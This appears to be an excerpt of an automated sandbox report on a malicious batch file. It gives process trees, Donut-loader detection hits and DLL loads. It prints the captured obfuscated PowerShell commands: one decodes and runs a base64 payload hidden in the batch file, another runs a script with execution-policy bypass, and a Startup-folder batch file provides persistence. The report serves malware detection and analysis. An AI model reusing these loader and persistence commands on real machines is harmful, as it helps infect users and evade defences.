              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FEAD7023_2_06FEAD70
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE53D023_2_06FE53D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE1BB823_2_06FE1BB8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FEC59823_2_06FEC598
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE604023_2_06FE6040
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE817823_2_06FE8178
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE816923_2_06FE8169
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE8E8223_2_06FE8E82
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FEAD6023_2_06FEAD60
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE4B0023_2_06FE4B00
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE12E823_2_06FE12E8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE12D923_2_06FE12D9
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE1F1C23_2_06FE1F1C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE1CB423_2_06FE1CB4
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE1D1023_2_06FE1D10
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE1BA823_2_06FE1BA8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_0734BEB823_2_0734BEB8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_0734D28823_2_0734D288
              Source: 00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000002.2919882763.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000012.00000002.1992910476.0000026210CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000A.00000002.2192754630.0000000003120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000002.00000002.1839501596.000001DC171B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 2908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 10.2.PING.EXE.7220000.2.raw.unpack, x0jkepdA6ZackeHF9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@40/34@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Phantom.ps1Jump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
              Source: C:\Windows\SysWOW64\PING.EXEMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
              Source: C:\Windows\SysWOW64\PING.EXEMutant created: \Sessions\1\BaseNamedObjects\5f4d3b53c7f75d94
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1ywjns4.ya0.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" "
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ping.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ping.exe&quot;)
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ping.exe&quot;)
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: email.batVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: amsi.dllJump to behavior
